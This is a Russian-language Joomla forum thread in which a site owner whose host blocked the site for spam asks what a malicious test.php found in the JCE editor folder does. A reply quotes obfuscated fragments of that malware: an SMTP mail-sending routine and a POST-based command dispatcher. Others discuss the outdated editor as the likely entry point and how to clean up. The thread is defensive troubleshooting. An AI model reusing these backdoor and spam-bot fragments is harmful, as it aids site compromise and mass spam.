Новости Joomla

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 6 Ответов
  • 1602 Просмотров
*

Beri

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
Вирус на сайте
« : 28.10.2013, 13:15:20 »
Здравствуйте.
Хостер заблокировал сайт за рассылку спама. По результатам сканирования нашёл и удалил пару десятков PHP файлов, обновил до последней версии JCE редактор, хостер сайт разблокировал, и чрез неделю снова блокировка, они своим антивирусом, со второй попытки нашли файл в директории: components/com_jce/editor/tiny_mce/plugins/textcase/img/test.php
файл был добавлен в середине сентября вот этот файл:
Спойлер
[свернуть]
 
Вопрос такой, что выполняет этот скрипт? и залили его через старую версию JCE редактора или не факт?
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Вирус на сайте
« Ответ #1 : 28.10.2013, 13:44:33 »
да выкиньте вы этот джисие! чо в нем такого важного? дырки в нем были в прошлом году и видать снова продырявили его, уже в том году вроде надо было всем урок сделать и с джеда удалить его по=хорошему давно пора!
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

dmayak

  • Захожу иногда
  • 80
  • 5 / 0
Re: Вирус на сайте
« Ответ #2 : 28.10.2013, 13:52:37 »
Как раз рассылка, похоже, сложно конечно что-то понять в этом нагромождении, но вот это явно отправка писем:
Код
@fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866);
 if (substr($ve98d2f00, 0, 3)!= 250 )
 return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866);
 if (substr($ve98d2f00, 0, 3)!= 250 )
 return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866);
 if (substr($ve98d2f00, 0, 3)!= 250 && substr($ve98d2f00, 0, 3)!= 251)
 return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866);
 if (substr($ve98d2f00, 0, 3)!= 354 )
 return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866);
 if (substr($ve98d2f00, 0, 3)!= 250 )
 return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } }
ну а вот это похоже прием команды:
Код
foreach (array_keys($_POST) as $v3c6e0b8a)
 { switch ($v3c6e0b8a[0]) { case chr(108):
Насчет через что залили тут уже сложно сказать, дыры могут быть во всем, начиная с редактора и заканчивая конфигурацией сервера. По теории можно определить по логам, но на практике там обнаружить что-то очень сложно. Лучшее решение если сайт небольшой - поставить новую Joomla и попереносить вручную контент, тогда точно вирус не перенесется, если нет то обновить все компоненты по возможности и почаще проверять.
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Вирус на сайте
« Ответ #3 : 28.10.2013, 13:55:19 »
А где версии? JCE, движка?
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Вирус на сайте
« Ответ #4 : 28.10.2013, 14:56:15 »
Похоже на скрипт спам рассылки... Все это расшифровывать никак :(

Походу там еще есть...
Записан
*

Beri

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
Re: Вирус на сайте
« Ответ #5 : 28.10.2013, 15:29:51 »
Движок 1.5.26, стояла версия редактора 2272 или 203
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Вирус на сайте
« Ответ #6 : 28.10.2013, 19:48:31 »
Цитата: Beri от 28.10.2013, 15:29:51
Движок 1.5.26, стояла версия редактора 2272 или 203
это сентябрь 2012, как раз когда бахнуло первой волной продырявливания... вас продырявили и еще до кучи там все понашпиговали, ВСЕ надо дихлофосом проходить, а не так, что скромно удалить джи-си-е и самого себя успокаивать))))
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 71278 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 3470 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 5104 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

 Ответов: 6
Просмотров: 3503 		Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

 Ответов: 13
Просмотров: 2108 		Последний ответ 16.05.2021, 18:52:24
от alekcae